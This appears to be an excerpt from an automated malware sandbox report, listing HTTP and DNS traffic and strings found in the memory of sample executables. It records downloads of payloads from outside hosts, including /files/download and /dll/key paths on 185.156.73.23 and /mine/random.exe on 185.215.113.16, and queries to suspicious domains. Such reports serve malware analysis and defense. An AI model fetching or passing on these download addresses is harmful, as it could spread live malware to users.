Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: dHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: sHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: home.fivegg5th.top
Source: global traffic	DNS traffic detected: DNS query: rampnatleadk.click
Source: global traffic	DNS traffic detected: DNS query: warlikedbeliev.org
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: youtube.com
Source: global traffic	DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic	DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic	DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: shavar.prod.mozaws.net
Source: global traffic	DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: example.org
Source: global traffic	DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic	DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic	DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: www.facebook.com
Source: global traffic	DNS traffic detected: DNS query: www.youtube.com
Source: global traffic	DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic	DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic	DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic	DNS traffic detected: DNS query: www.reddit.com
Source: global traffic	DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic	DNS traffic detected: DNS query: reddit.map.fastly.net
Source: global traffic	DNS traffic detected: DNS query: twitter.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: services.addons.mozilla.org
Source: global traffic	DNS traffic detected: DNS query: normandy.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: normandy.tombstone.experimenter.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: a19.dscg10.akamai.net

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: rampnatleadk.click

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Sat, 01 Feb 2025 16:18:35 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Sat, 01 Feb 2025 16:18:36 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Source: 382cd038a3.exe, 00000010.00000003.2214419534.0000000007614000.00000004.00001000.00020000.00000000.sdmp, 382cd038a3.exe, 00000010.00000002.2349258270.0000000000DA5000.00000040.00000001.01000000.00000010.sdmp	String found in binary or memory: http://.css
Source: 382cd038a3.exe, 00000010.00000003.2214419534.0000000007614000.00000004.00001000.00020000.00000000.sdmp, 382cd038a3.exe, 00000010.00000002.2349258270.0000000000DA5000.00000040.00000001.01000000.00000010.sdmp	String found in binary or memory: http://.jpg
Source: 3f28c42ac4.exe, 0000000D.00000003.2473417129.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2553807942.00000000055B5000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2448435327.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2499413697.00000000055B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/
Source: 3f28c42ac4.exe, 0000000D.00000003.2473417129.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2553807942.00000000055B5000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2499413697.00000000055B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/2
Source: 3f28c42ac4.exe, 0000000D.00000003.2473417129.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2553807942.00000000055B5000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2499413697.00000000055B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/46122658-3693405117-2476756634-1003
Source: 3f28c42ac4.exe, 0000000D.00000003.2396809433.00000000055B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/add?substr=mixtwo&s=three&sub=emp
Source: 3f28c42ac4.exe, 0000000D.00000003.2344330413.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2287187589.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2316054606.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2261298532.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2422219214.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2233278995.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2371012925.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2396809433.00000000055B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/add?substr=mixtwo&s=three&sub=emp7
Source: 3f28c42ac4.exe, 0000000D.00000003.2344330413.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2287187589.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2473417129.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2316054606.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2553807942.00000000055B5000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2261298532.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2422219214.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2448435327.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2233278995.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2371012925.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2499413697.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000002.3105970241.00000000055B0000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2396809433.00000000055B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/add?substr=mixtwo&s=three&sub=empZ
Source: 3f28c42ac4.exe, 0000000D.00000003.2261298532.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2233278995.00000000055B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/add?substr=mixtwo&s=three&sub=empi
Source: 3f28c42ac4.exe, 0000000D.00000003.2448435327.00000000055C5000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2316054606.00000000055C5000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2371012925.00000000055C5000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000002.2736864441.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2233278995.00000000055C5000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2422219214.00000000055C5000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2499413697.00000000055C5000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2396809433.00000000055C5000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2287187589.00000000055C5000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2473417129.00000000055C5000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2261298532.00000000055C5000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2344330413.00000000055C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/dll/download
Source: 3f28c42ac4.exe, 0000000D.00000003.2344330413.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2287187589.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2316054606.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2261298532.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2422219214.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2233278995.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2371012925.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000002.3105970241.00000000055B0000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2396809433.00000000055B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/dll/key
Source: 3f28c42ac4.exe, 0000000D.00000002.3105970241.00000000055B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/dll/keyG
Source: 3f28c42ac4.exe, 0000000D.00000003.2521595730.000000000588A000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2344330413.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2287187589.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2473417129.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000002.2736864441.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2316054606.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2553807942.00000000055B5000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2261298532.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2422219214.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2448435327.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2233278995.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2371012925.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2499413697.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2396809433.00000000055B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/download
Source: 3f28c42ac4.exe, 0000000D.00000003.2473417129.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2553807942.00000000055B5000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2422219214.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2448435327.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2371012925.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2499413697.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2396809433.00000000055B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/download23/add?substr=mixtwo&s=three&sub=emp
Source: 3f28c42ac4.exe, 0000000D.00000003.2287187589.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2316054606.00000000055B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/download23/add?substr=mixtwo&s=three&sub=empi
Source: 3f28c42ac4.exe, 0000000D.00000003.2473417129.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2553807942.00000000055B5000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2422219214.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2448435327.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2499413697.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2396809433.00000000055B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/download23/files/download
Source: 3f28c42ac4.exe, 0000000D.00000003.2344330413.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2287187589.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2316054606.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2553807942.00000000055B5000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2261298532.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2371012925.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2499413697.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2396809433.00000000055B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/download23/files/downloadoft
Source: 3f28c42ac4.exe, 0000000D.00000003.2473417129.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2422219214.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2448435327.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2499413697.00000000055B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/download23/files/downloadwo&s=three&sub=empi
Source: 3f28c42ac4.exe, 0000000D.00000003.2521595730.000000000588A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/downloadL
Source: 3f28c42ac4.exe, 0000000D.00000003.2521595730.000000000588A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/downloadR
Source: 3f28c42ac4.exe, 0000000D.00000003.2521595730.000000000588A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/downloadT
Source: 3f28c42ac4.exe, 0000000D.00000003.2521595730.000000000588A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/downloadX
Source: 3f28c42ac4.exe, 0000000D.00000003.2521595730.000000000588A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/downloadb
Source: 3f28c42ac4.exe, 0000000D.00000003.2448435327.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2371012925.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2499413697.00000000055B4000.00000004.00000020.00020000.00000000.sdmp, 3f28c42ac4.exe, 0000000D.00000003.2396809433.00000000055B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/downloadoft
Source: 3f28c42ac4.exe, 0000000D.00000003.2521595730.000000000588A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.156.73.23/files/downloadp
